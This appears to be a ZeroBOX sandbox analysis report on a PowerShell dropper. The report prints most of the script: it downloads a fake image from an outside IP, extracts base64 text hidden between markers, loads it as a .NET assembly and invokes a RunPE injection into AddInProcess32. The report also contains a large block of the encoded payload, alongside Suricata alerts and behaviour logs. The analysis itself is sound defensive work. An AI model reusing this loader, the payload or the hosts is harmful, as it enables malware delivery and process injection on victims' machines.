Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	July 4, 2024, 10:12 a.m.	July 4, 2024, 10:14 a.m.

Size	1.3KB
Type	UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
MD5	`f00fd53fc736d0735418600c428a6764`
SHA256	`12e35a4253b32b98947acf7ca78c4f4bba58f438c7d84004bc48d823ed483e48`
CRC32	`FA418477`
ssdeep	`24:8/5nFrVkJxurmNLw1YrEE06eEgS/IJLXzuDZaT2xKATxZFwzlQ3qM6In:8/HGHu6K1YAE06ed+IJLX4ZagKCXFwpM`
Yara	None matched

powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy unrestricted -File C:\Users\test22\AppData\Local\Temp\file_3e3wgwby.144.txt.ps1
2540

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
91.92.254.132	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 91.92.254.132:80 -> 192.168.56.101:49162	2400012	ET DROP Spamhaus DROP Listed Traffic Inbound group 13	Misc Attack
TCP 91.92.254.132:80 -> 192.168.56.101:49162	2047750	ET MALWARE Base64 Encoded MZ In Image	A Network Trojan was detected
TCP 91.92.254.132:80 -> 192.168.56.101:49162	2049038	ET MALWARE Malicious Base64 Encoded Payload In Image	A Network Trojan was detected

Suricata TLS

No Suricata TLS

Queries for the computername (1 event)

Time & API	Arguments	Status	Return	Repeated
GetComputerNameW July 4, 2024, 10:12 a.m.	computer_name: TEST22-PC	1	1	0

Command line console output was observed (19 events)

Time & API	Arguments	Status	Return
WriteConsoleW July 4, 2024, 10:12 a.m.	buffer: Exception calling "Invoke" with "2" argument(s): "The requested security protoc console_handle: 0x00000023	1	1
WriteConsoleW July 4, 2024, 10:12 a.m.	buffer: ol is not supported." console_handle: 0x0000002f	1	1
WriteConsoleW July 4, 2024, 10:12 a.m.	buffer: At line:1 char:917 console_handle: 0x0000003b	1	1
WriteConsoleW July 4, 2024, 10:12 a.m.	buffer: + $link = 'http://91.92.254.132/imge/new-image_j.jpg'; $webClient = New-Object console_handle: 0x00000047	1	1
WriteConsoleW July 4, 2024, 10:12 a.m.	buffer: System.Net.WebClient; try { $downloadedData = $webClient.DownloadData($link) } console_handle: 0x00000053	1	1
WriteConsoleW July 4, 2024, 10:12 a.m.	buffer: catch { Write-Host 'Failed To download data from $link' -ForegroundColor Red; e console_handle: 0x0000005f	1	1
WriteConsoleW July 4, 2024, 10:12 a.m.	buffer: xit }; if ($downloadedData -ne $null) { $imageText = [System.Text.Encoding]::UT console_handle: 0x0000006b	1	1
WriteConsoleW July 4, 2024, 10:12 a.m.	buffer: F8.GetString($downloadedData); $startFlag = '<<BASE64_START>>'; $endFlag = '<<B console_handle: 0x00000077	1	1
WriteConsoleW July 4, 2024, 10:12 a.m.	buffer: ASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageT console_handle: 0x00000083	1	1
WriteConsoleW July 4, 2024, 10:12 a.m.	buffer: ext.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { console_handle: 0x0000008f	1	1
WriteConsoleW July 4, 2024, 10:12 a.m.	buffer: $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $bas console_handle: 0x0000009b	1	1
WriteConsoleW July 4, 2024, 10:12 a.m.	buffer: e64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = console_handle: 0x000000a7	1	1
WriteConsoleW July 4, 2024, 10:12 a.m.	buffer: [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.R console_handle: 0x000000b3	1	1
WriteConsoleW July 4, 2024, 10:12 a.m.	buffer: eflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('RunP console_handle: 0x000000bf	1	1
WriteConsoleW July 4, 2024, 10:12 a.m.	buffer: E.Home'); $method = $type.GetMethod('VAI').Invoke <<<< ($null, [object[]] ('txt console_handle: 0x000000cb	1	1
WriteConsoleW July 4, 2024, 10:12 a.m.	buffer: .lanoitarteikoodyeko/531.46.3.291//:ptth' , 'desativado' , 'desativado' , 'desa console_handle: 0x000000d7	1	1
WriteConsoleW July 4, 2024, 10:12 a.m.	buffer: tivado','AddInProcess32','desativado')) } } console_handle: 0x000000e3	1	1
WriteConsoleW July 4, 2024, 10:12 a.m.	buffer: + CategoryInfo : NotSpecified: (:) [], MethodInvocationException console_handle: 0x000000ef	1	1
WriteConsoleW July 4, 2024, 10:12 a.m.	buffer: + FullyQualifiedErrorId : DotNetMethodTargetInvocation console_handle: 0x000000fb	1	1

Uses Windows APIs to generate a cryptographic key (8 events)

Time & API	Arguments	Status	Return
CryptExportKey July 4, 2024, 10:12 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00491c18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 4, 2024, 10:12 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00491c18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 4, 2024, 10:12 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00491cd8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 4, 2024, 10:12 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00491cd8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 4, 2024, 10:12 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00491cd8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 4, 2024, 10:12 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00491cd8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 4, 2024, 10:12 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00491cd8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 4, 2024, 10:12 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00491cd8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx July 4, 2024, 10:12 a.m.		1	1	0

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

HTTP traffic contains suspicious features which may be indicative of malware related traffic (1 event)

suspicious_features

GET method with no useragent header, Connection to IP address

suspicious_request

GET http://91.92.254.132/imge/new-image_j.jpg

Performs some HTTP requests (1 event)

request

GET http://91.92.254.132/imge/new-image_j.jpg

Allocates read-write-execute memory (usually to unpack itself) (42 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory July 4, 2024, 10:12 a.m.	process_identifier: 2540 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0208b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 4, 2024, 10:12 a.m.	process_identifier: 2540 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026ef000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 4, 2024, 10:12 a.m.	process_identifier: 2540 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02069000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 4, 2024, 10:12 a.m.	process_identifier: 2540 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05750000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 4, 2024, 10:12 a.m.	process_identifier: 2540 region_size: 327680 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7ef40000 allocation_type: 1056768 (MEM_RESERVE\|MEM_TOP_DOWN) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 4, 2024, 10:12 a.m.	process_identifier: 2540 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7ef40000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 4, 2024, 10:12 a.m.	process_identifier: 2540 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7ef40000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 4, 2024, 10:12 a.m.	process_identifier: 2540 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7ef30000 allocation_type: 1056768 (MEM_RESERVE\|MEM_TOP_DOWN) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 4, 2024, 10:12 a.m.	process_identifier: 2540 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7ef30000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 4, 2024, 10:12 a.m.	process_identifier: 2540 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05751000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 4, 2024, 10:12 a.m.	process_identifier: 2540 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05770000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 4, 2024, 10:12 a.m.	process_identifier: 2540 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026e9000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 4, 2024, 10:12 a.m.	process_identifier: 2540 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a02000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 4, 2024, 10:12 a.m.	process_identifier: 2540 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05476000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 4, 2024, 10:12 a.m.	process_identifier: 2540 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05477000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 4, 2024, 10:12 a.m.	process_identifier: 2540 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05478000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 4, 2024, 10:12 a.m.	process_identifier: 2540 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05752000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 4, 2024, 10:12 a.m.	process_identifier: 2540 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05753000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 4, 2024, 10:12 a.m.	process_identifier: 2540 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05754000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 4, 2024, 10:12 a.m.	process_identifier: 2540 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05755000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 4, 2024, 10:12 a.m.	process_identifier: 2540 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05756000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 4, 2024, 10:12 a.m.	process_identifier: 2540 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05757000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 4, 2024, 10:12 a.m.	process_identifier: 2540 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05758000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 4, 2024, 10:12 a.m.	process_identifier: 2540 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05759000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 4, 2024, 10:12 a.m.	process_identifier: 2540 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0575a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 4, 2024, 10:12 a.m.	process_identifier: 2540 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0575b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 4, 2024, 10:12 a.m.	process_identifier: 2540 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02900000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 4, 2024, 10:12 a.m.	process_identifier: 2540 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0575c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 4, 2024, 10:12 a.m.	process_identifier: 2540 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02901000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 4, 2024, 10:12 a.m.	process_identifier: 2540 region_size: 458752 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02910000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 4, 2024, 10:12 a.m.	process_identifier: 2540 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02940000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 4, 2024, 10:12 a.m.	process_identifier: 2540 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02941000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 4, 2024, 10:12 a.m.	process_identifier: 2540 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02942000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 4, 2024, 10:12 a.m.	process_identifier: 2540 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02943000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 4, 2024, 10:12 a.m.	process_identifier: 2540 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02944000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 4, 2024, 10:12 a.m.	process_identifier: 2540 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0575d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 4, 2024, 10:12 a.m.	process_identifier: 2540 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0575e000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 4, 2024, 10:12 a.m.	process_identifier: 2540 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0206d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 4, 2024, 10:12 a.m.	process_identifier: 2540 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0575f000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 4, 2024, 10:12 a.m.	process_identifier: 2540 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05461000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 4, 2024, 10:12 a.m.	process_identifier: 2540 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02920000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 4, 2024, 10:12 a.m.	process_identifier: 2540 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05771000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses July 4, 2024, 10:12 a.m.	flags: 15 family: 0		111	0

URL downloaded by powershell script (4 events)

Data received	)áD^àÍ× »¥Ùµ'Ò8ÇÆ·û^UÕ]H,^`&û!äSgõ«kÝ&iN T ªíSÅÀâÚåÙ3¸ßBÜÎ}<Èhîã\ Wðí³BHOÞ½ux/2u?f]!=+ÊÎBî^6:ßRHÍ°;+ç?ëéuzí8/¡Wª2ß&ÏJ<ýp2¼ nÄÃ°)÷£wUÏ¯é\|ZIôJ%hö²¼Ð6 gË¥y{,Çi%{{V{³<ÌcÒêc@Qgó¯åêàÕT+åºº°aaèAøæ«jÕ5:e[Ä2·á<uç¾Ù¨²Ã§H¤UÚYNÂ6óÁ¿1¤UµnZÈàû\|O~GljmãmÔ`åÕQ\|mès<ê1QÅpOªQ¤TU¢NãÀ®üfmKøf§a&µ#ñpsó¾®5û¬òï£Ùõïû] & £wde&þþ¿®\|W,oáò!p®¬ {àbl n1Ý3»D9³\|y¸à1e¦-^râ2ÊmE¬¨5;è©Ô$ADYN<µXöZ<WL¾âþc8àô:Ö\¾ÄÎùàB&àVl#ª-T Ä)µ%vQè=¯¾2\m, ðr:}qµrR~3ÐÖÚ<÷ÆDkÒFV7U}$cºö¿¶:tÓ<Q<`3I·Óé/¡Úw6949ù]ðé&5fShÌ~EIü?]jiãÓÞÕ·3qék;x±føºäñÒ:1UônfÚY÷"¨P:òóÓÎ"ûÉØhÛWp<¹[qm¯´µí?Í?®ÖÅ<k{v¨V{¬ <Wÿ\|è?\]&0È±±Xî2;(b^)¯Ó$ªãÂ]TZæ1ªcÇ#¦Oâ $²¤VøÚM!;Oá¬2Í§×/RÚ8£l}ðÖËÂH>-²Ç©î2uz)4úÔ´wÃW\`tïdc ËyrÚ ÑàU':¢Á$_éðýè¥¤nü9 ¤5X+ÀKY¢ÒóY\4 Æf¤ú^&þl0ÍçØÑ8<ýÐK½HSÐQÁ7YüÍ3ü&ÁS\p)3ÊÃ vçÚ'r¡Ê:äù/±ÑÕ×>ø2ùÊÈHP£¯scbÂ¹±.F¯¨Á$e%°z®IM±J .¯ÕD Ù7á¾¸}##H m¶l6¥Òfm"ºà¼7LñyF»¯ü0jxÖ· Ù+¸úcb$gT2ícÒï^8ÕTu¿jÀè`ó¢©g7Ï£Åü±B)(£pjq5± µW =²Vz-~¢EÀÐETDíÛ¾fO¨BÎ5nººçVÞö ñW\|RmÌ\LÔIíTUT±VïlD#vÖ¯â aâT@©v@«÷Îbâè©^}¨E.Þ/¹ÍbñíUµ4lSHªC(#hç'FÑIÆûo\|$vdì¤^bÓÀåå$éÅbmb»Ìxq6äa¾¯B&vQD ¸Å 2~#5¤³'âKãÔí$ÜO@p3ë:±¨ôþl[¢;à¤Q»é<ËH"ÊÖVue¨ß?<¼jOE'é>¢Ir.át(H'l¥`YÈ,JÆV³«'È»Ü-Õá¤À ÙúaôË½É, íY£0Ë°úã:Wvuÿ¶mC»m`¬Êhs««ìk ÛRÉÚC®»ãè06f@ÆÑ?\ÏEáð¨ o?ÒS®Ô/åËDÖ 04Õáã$ bÁXÐ=f4Ë@]0ê$.P°0q6¢BÔ@ s°`A$qf«ÃÌIf&¨ñðÎwR5°À<Z©<ÒÏÅÜò1¨¹iTÐøpU-êøwÇbZ(á[dÆÓÄ]#e6yïó«iÔ%@º§#ê»è£`^ÓÊv©<^ø5)*òAàbí©Dp
Data received	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////ABEHbwkEAAYgBQAAADhW////3a7+//8TBCAAAAAAfu8RAAR7uhEABDoPAAAAJiABAAAAOAQAAAD+DAMARQIAAAA7AAAABQAAADg2AAAAAHIpCABwEQQoqAMABiipAwAGKKoDAAYgAAAAAH7vEQAEe5gRAAQ5w////yYgAAAAADi4////AADdY/7//yYgAAAAAH7vEQAEe68RAAQ6DwAAACYgAAAAADgEAAAA/gwBAEUBAAAABQAAADgAAAAAAADdKv7//yYgAAAAAH7vEQAEe4sRAAQ6DwAAACYgAAAAADgEAAAA/gwIAEUBAAAABQAAADgAAAAAAADd8f3//yAFAAAAfu8RAAR71hEABDor/f//JiAEAAAAOCD9//84pP3//yAJAAAAOBH9//8AAAABKAAAAAASAdvtAXRdAAACAAASAdthAjlPAAABAAASAduaAjlQAAABGzADAAgBAACpAAARIAIAAAD+DgMAOAAAAAD+DAMARQMAAAAFAAAAKAAAAAgAAAA4AAAAABEBKgAgAQAAAH7vEQAEe5gRAAQ60v///yYgAQAAADjH////AAACKKsDAAYTASAAAAAAfu8RAAR76xEABDoPAAAAJiAAAAAAOAQAAAD+DAIARQEAAAAFAAAAOAAAAADdnf///yYgAAAAAH7vEQAEe54RAAQ6DwAAACYgAAAAADgEAAAA/gwAAEUCAAAABQAAACgAAAA4AAAAAAACEwEgAAAAAH7vEQAEe6wRAAQ61v///yYgAQAAADjL////3T////8gAAAAAH7vEQAEe58RAAQ5Ff///yYgAAAAADgK////ARAAAAAATAA/iwBeAQAA
